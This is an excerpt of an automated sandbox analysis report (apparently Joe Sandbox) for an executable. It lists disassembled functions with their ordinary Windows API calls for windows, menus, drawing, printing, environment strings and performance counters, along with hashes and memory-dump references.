Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhCloseQuery$@
API String ID: 1866314245-2960117074
Opcode ID: 759f841aff4576a252ef7a2e50e57e73bc9b321e548c0bb1885a76e49182cd85
Instruction ID: 6c702f40019b3ad2a0586d60c167e0bc64eccd5b04b399ccfd92b8d118dbd417
Opcode Fuzzy Hash: 759f841aff4576a252ef7a2e50e57e73bc9b321e548c0bb1885a76e49182cd85
Instruction Fuzzy Hash: 22F019B1A003115BD610EF779C159573BAC9A507953444C3AE809D3251FAB4D460CB9E

Function 0040EB55 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040EB65
GetLastError.KERNEL32 ref: 0040EB74
GetProcAddress.KERNEL32(?,PdhCollectQueryData), ref: 0040EB8A
GetLastError.KERNEL32(?,PdhCollectQueryData), ref: 0040EB99

Strings

P@, xrefs: 0040EB92, 0040EBA1
PDH.DLL, xrefs: 0040EB60
PdhCollectQueryData, xrefs: 0040EB84

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhCollectQueryData$P@
API String ID: 1866314245-1981356165
Opcode ID: 37e93f0d8eaa2fb197b69d59bad7ccfc352c403f0d277f06ce5f738852a5e4e7
Instruction ID: d8f65e5670229fdcca9cdd331e3e2157f8ea75ae1d9f2b75894c91f06cc314c1
Opcode Fuzzy Hash: 37e93f0d8eaa2fb197b69d59bad7ccfc352c403f0d277f06ce5f738852a5e4e7
Instruction Fuzzy Hash: F8F037B1A403156BD610EF77AC059573BACDA507993448C3AF80AE3251FBB8E461CB9F

Function 025014A0 Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 025014DB
SetLastError.KERNEL32(0000007F), ref: 02501507

Memory Dump Source

Source File: 00000000.00000002.1492413243.0000000002501000.00000020.00001000.00020000.00000000.sdmp, Offset: 02501000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2501000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 70a3677a14a47c801573ed76146983ed792b8fff94e2ebffdada4e5c0a701e60
Instruction ID: 2858a086bfa05c096cf1d5b8bbcd5db305a9d22e011d4e95408a8317844b2c43
Opcode Fuzzy Hash: 70a3677a14a47c801573ed76146983ed792b8fff94e2ebffdada4e5c0a701e60
Instruction Fuzzy Hash: E671D574E00509EFDB08DF94C9D0BADB7B2BF48304F248598D51AAB385D734AA81DF99

Function 0042080A Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0041AAFB), ref: 00420825
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0041AAFB), ref: 00420839
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0041AAFB), ref: 00420865
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0041AAFB), ref: 0042089D
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0041AAFB), ref: 004208BF
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0041AAFB), ref: 004208D8
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0041AAFB), ref: 004208EB
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00420929

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 894466e17bba830aab3c9d2b2d2343c25d9017feefff53e57b5b3c9d2108226e
Instruction ID: 10182a173a396fd821de4e815b73d7b01cfa068b26624681f7eb54afb4b34b87
Opcode Fuzzy Hash: 894466e17bba830aab3c9d2b2d2343c25d9017feefff53e57b5b3c9d2108226e
Instruction Fuzzy Hash: DC3137B2B053356FE7203B797CC483FB6DCE685358795053BF552C3213E6698C8186AA

Function 004322CC Relevance: 12.1, APIs: 8, Instructions: 120windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004322FF
BeginDeferWindowPos.USER32(00000008), ref: 0043230D
GetTopWindow.USER32(?), ref: 0043231F
GetDlgCtrlID.USER32(00000000), ref: 0043232E
SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 00432360
GetWindow.USER32(00000000,00000002), ref: 00432369
CopyRect.USER32(?,?), ref: 00432385

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
String ID:
API String ID: 3332788312-0
Opcode ID: 65713d4fb12b705146a2be8cc3846363c68e1da9c77644452757e49d50ed4726
Instruction ID: 1626c5348cb9e077d1203e42e0b8c022c1c9b341f23bfe9ece6b978bbded4e12
Opcode Fuzzy Hash: 65713d4fb12b705146a2be8cc3846363c68e1da9c77644452757e49d50ed4726
Instruction Fuzzy Hash: 78412771900209EFCF14DFA4DA848AEB7B9FF0C341F14516AE905A7251C778AE41DFA9

Function 00401B60 Relevance: 12.1, APIs: 8, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042D81A: ImageList_Create.COMCTL32(?,?,?,?,?), ref: 0042D82F

ImageList_SetBkColor.COMCTL32(?,00FFFFFF), ref: 00401B95
LoadIconA.USER32(?,00000083), ref: 00401BAF
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 00401BBE
LoadIconA.USER32(?,00000086), ref: 00401BCE
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 00401BD7
LoadIconA.USER32(?,000000C6), ref: 00401BE7
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 00401BF0
SendMessageA.USER32(?,00001109,00000000,?), ref: 00401C05

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Icon$ImageList_$LoadReplace$ColorCreateMessageSend
String ID:
API String ID: 587372060-0
Opcode ID: da089cbab0500c810d3e320d2d6406fd6d139ecfe7265d7f4411f7f05f6c2d1a
Instruction ID: ea51b67250b08de663a05c9824d0b6ef0f6c2127791d4b2f2004811535b5dfff
Opcode Fuzzy Hash: da089cbab0500c810d3e320d2d6406fd6d139ecfe7265d7f4411f7f05f6c2d1a
Instruction Fuzzy Hash: FB11A2716043047FE620ABA5DC46F6BB3A8EF89724F11871DB755AB2D2CA79E800C758

Function 0043584A Relevance: 12.1, APIs: 8, Instructions: 73stringthreadCOMMON

Download Yara Rule

APIs

lstrcmpiA.KERNEL32(?,?), ref: 0043585D
GetSystemMetrics.USER32(0000002A), ref: 0043586D
lstrlenA.KERNEL32(?), ref: 00435882
lstrlenA.KERNEL32(?), ref: 00435889
GetThreadLocale.KERNEL32 ref: 0043588F
GetStringTypeA.KERNEL32(00000000,00000001,?,000000FF,?), ref: 004358AA
GetStringTypeA.KERNEL32(00000000,00000004,?,000000FF,?), ref: 004358B9
GetStringTypeA.KERNEL32(00000000,00000001,?,000000FF,?), ref: 004358CA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: StringType$lstrlen$LocaleMetricsSystemThreadlstrcmpi
String ID:
API String ID: 1373347803-0
Opcode ID: 87b8c0fecbb202da72ea4ef6bfb3174306f8c4bd928f131a40aa3706b1b1b1b2
Instruction ID: 7412d0d6aafb39c83937ed3e640fbe828aa2630e48dfbadddb032d2d238f887c
Opcode Fuzzy Hash: 87b8c0fecbb202da72ea4ef6bfb3174306f8c4bd928f131a40aa3706b1b1b1b2
Instruction Fuzzy Hash: 4C112C7160071CBADB212BA49C44FEB3B6CDF49730F144662FD25971D1E6B4C981CBA8

Function 004341C8 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 004341E8
lstrcmpA.KERNEL32(?,?), ref: 004341F4
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00434206
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00434229
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00434231
GlobalLock.KERNEL32(00000000), ref: 0043423E
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0043424B
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00434269

Part of subcall function 0043918A: GlobalFlags.KERNEL32(?), ref: 00439194
Part of subcall function 0043918A: GlobalUnlock.KERNEL32(?), ref: 004391AB
Part of subcall function 0043918A: GlobalFree.KERNEL32(?), ref: 004391B6

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 370a6c8f47aa927eeabe1333754ed91b35f6ab7a07606cb854ef5cfefb62df2b
Instruction ID: 690837d5c8d9ff036fe57c5cb54002bec64524cfffc16c2c61e71697d458aa86
Opcode Fuzzy Hash: 370a6c8f47aa927eeabe1333754ed91b35f6ab7a07606cb854ef5cfefb62df2b
Instruction Fuzzy Hash: 4311E331600604BAEB215BB6DC49EBF7BBDEFC9780F40005EFA09D1112D6B9DD009B28

Function 00443FF6 Relevance: 12.1, APIs: 8, Instructions: 57COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000006), ref: 0044400A
GetSystemMetrics.USER32(00000005), ref: 00444011
GetSystemMetrics.USER32(00000021), ref: 00444017
GetSystemMetrics.USER32(00000020), ref: 0044401D

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

OffsetRect.USER32(?,00000000,?), ref: 00444056
GetWindowDC.USER32(?,?,?,?), ref: 00444062
InvertRect.USER32(?,?), ref: 00444077
ReleaseDC.USER32(?,?), ref: 00444083

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MetricsSystem$RectWindow$InvertLongOffsetRelease
String ID:
API String ID: 2500086165-0
Opcode ID: bc685f7a2bbc3d40b1b3bef94332f67375e3fd20e248967fb4fdf35f88b85af0
Instruction ID: cc4bd6259e1ed1eb962f73e804d74a1f0143f533b7a53e8d5fa7707709dc58f0
Opcode Fuzzy Hash: bc685f7a2bbc3d40b1b3bef94332f67375e3fd20e248967fb4fdf35f88b85af0
Instruction Fuzzy Hash: 63112872D00318AFDB00AFF9DC4999EBFB9EF48311F104166E605E3261EB70AA40CB94

Function 00412BBB Relevance: 10.7, APIs: 7, Instructions: 231memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412BC0
MapDialogRect.USER32(?,?), ref: 00412C46
SysAllocStringLen.OLEAUT32(?,00000000), ref: 00412C67
CLSIDFromString.OLE32(0000FFFC,?), ref: 00412D52
CLSIDFromProgID.OLE32(0000FFFC,?), ref: 00412D5A
SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,?,0000FC84,00000000), ref: 00412DF6
SysFreeString.OLEAUT32(?), ref: 00412E49

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prologProgRectWindow
String ID:
API String ID: 493809305-0
Opcode ID: 74bb49b419bfa336f8121a40af8021dc41cdf2dc714c81eb4267fe143512129a
Instruction ID: 10fd4d95f9fe10da3293af23f89085c8bd637d131fecfbb6fa2abee0617eeed8
Opcode Fuzzy Hash: 74bb49b419bfa336f8121a40af8021dc41cdf2dc714c81eb4267fe143512129a
Instruction Fuzzy Hash: 4DA1397190021ADFDB04DFA5D984AEEBBB4FF08304F14412AE819E7351E7749A94CBA9

Function 0040A0C0 Relevance: 10.7, APIs: 7, Instructions: 192windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 0040A111
GetMenuState.USER32(?,00000000,00000400), ref: 0040A12B
GetMenuItemCount.USER32(?), ref: 0040A2A7

Part of subcall function 0040A960: GetSubMenu.USER32(?,00000002), ref: 0040A969

GetMenuStringA.USER32(?,00000000,00000000,00000100,00000100), ref: 0040A173

Part of subcall function 0042F65E: lstrlenA.KERNEL32(?,00000100,00433FDB,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 0042F671

Part of subcall function 004094C0: ModifyMenuA.USER32(?,?,?,?,00000000), ref: 0040958C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Menu$CountItem$ModifyStateStringlstrlen
String ID:
API String ID: 4136268729-0
Opcode ID: d64e639c1f47dfdf0b698961a13cfd19c73fcb5aa70f6a0c081acb193ddfe4cf
Instruction ID: 1f2a9d6a2ae385d1f62075975c357f014888163f3b1c0c1c39bcdefda23c11cb
Opcode Fuzzy Hash: d64e639c1f47dfdf0b698961a13cfd19c73fcb5aa70f6a0c081acb193ddfe4cf
Instruction Fuzzy Hash: 5951C170204701AFC614EF25C995F2FB7E9AB84B54F500A2EF456A73C1DB38EC05876A

Function 0042B3A1 Relevance: 10.6, APIs: 7, Instructions: 140COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,00000000), ref: 0042B3F3
CallWindowProcA.USER32(00000000), ref: 0042B415

Part of subcall function 00428280: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 004282A6
Part of subcall function 00428280: RemovePropA.USER32(?,00000000), ref: 004282BE
Part of subcall function 00428280: RemovePropA.USER32(?,00000000), ref: 004282CA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: c98786c8db9357aaf221549d105295a69d5e867cfc133932ad23c69217998504
Instruction ID: 5883e1b8f0228098209ed1908934e1dc9fd8ae52dc67d283e5c917927718ce9a
Opcode Fuzzy Hash: c98786c8db9357aaf221549d105295a69d5e867cfc133932ad23c69217998504
Instruction Fuzzy Hash: F03107777012206BD310A795BC85DAFB7ACEF85365F44042AFA05C7212E73D990A87BB

Function 00417FB5 Relevance: 10.6, APIs: 7, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00417FBA
VariantClear.OLEAUT32(?), ref: 0041805F
SysFreeString.OLEAUT32(00000000), ref: 004180E0
SysFreeString.OLEAUT32(00000000), ref: 004180EF
SysFreeString.OLEAUT32(00000000), ref: 004180FE
VariantClear.OLEAUT32(?), ref: 00418108
VariantClear.OLEAUT32(?), ref: 00418119

Part of subcall function 004177DE: __EH_prolog.LIBCMT ref: 004177E3
Part of subcall function 004177DE: VariantClear.OLEAUT32(00000007), ref: 00417D37
Part of subcall function 004177DE: VariantClear.OLEAUT32(?), ref: 00417F44

Part of subcall function 0041329B: VariantCopy.OLEAUT32(?,?), ref: 004132A3

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Variant$Clear$FreeString$H_prolog$Copy
String ID:
API String ID: 3345578691-0
Opcode ID: c950e8af7990e91fffc2d9b440a95f7353a50159f9a8e1ad7be5f479b16171d3
Instruction ID: c8be95067affc3afa978999ac6d20ac03616597b7a7a513e1ea60a451dcc5b64
Opcode Fuzzy Hash: c950e8af7990e91fffc2d9b440a95f7353a50159f9a8e1ad7be5f479b16171d3
Instruction Fuzzy Hash: 28510B71900209EFDB14DFA4C885BEEBBB8FF08319F20452EE115A7291DB75A985CF54

Function 0043305A Relevance: 10.6, APIs: 7, Instructions: 122windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0043308E
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004330B7
UpdateWindow.USER32(?), ref: 004330D3
SendMessageA.USER32(?,00000121,00000000,?), ref: 004330F9
SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 00433118
UpdateWindow.USER32(?), ref: 0043315B
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0043318E

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: e31af9d36e84cdb757d4e6b52ffa550cea09cf7f76d2a4bcc3e31dce94ea4f88
Instruction ID: 2144a7871275cbda6726b947fd02ed4c59bd8084961ea68437b48527ef298a12
Opcode Fuzzy Hash: e31af9d36e84cdb757d4e6b52ffa550cea09cf7f76d2a4bcc3e31dce94ea4f88
Instruction Fuzzy Hash: D741A330604741AFDB20DF26D844B2BBAF4FFC8B56F100A1EF48196292C779DA45CB5A

Function 0040AE90 Relevance: 10.6, APIs: 7, Instructions: 117COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0040AF1F
OffsetRect.USER32(?,?,?), ref: 0040AF44
IntersectRect.USER32(?,?,00000000), ref: 0040AF5D
IsRectEmpty.USER32(?), ref: 0040AF68
InflateRect.USER32(?,00000000,000000FF), ref: 0040AF9E
OffsetRect.USER32(?,?,?), ref: 0040AFB5
GetSysColor.USER32(00000004), ref: 0040AFC9

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Offset$ColorEmptyInflateIntersectWindow
String ID:
API String ID: 3895889793-0
Opcode ID: 6600046056907449994b97e83a71c56256a61aa3ddae4e8e96f40e1f139c79d6
Instruction ID: c79ea9390b7bed0932f703f2e3c82dee262ec40b41e82e0179daa35f538ebef9
Opcode Fuzzy Hash: 6600046056907449994b97e83a71c56256a61aa3ddae4e8e96f40e1f139c79d6
Instruction Fuzzy Hash: 7A3175B12043026FC614EB65CC95D7F73A9AB88315F044A2DF95AD3281EB38E809C76A

Function 00428360 Relevance: 10.6, APIs: 7, Instructions: 109COMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?), ref: 0042837D
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004283CA
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004283F9
SetBkColor.GDI32(?,?), ref: 00428417
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00428442
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042847C
SetBkColor.GDI32(?,00000000), ref: 00428484

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
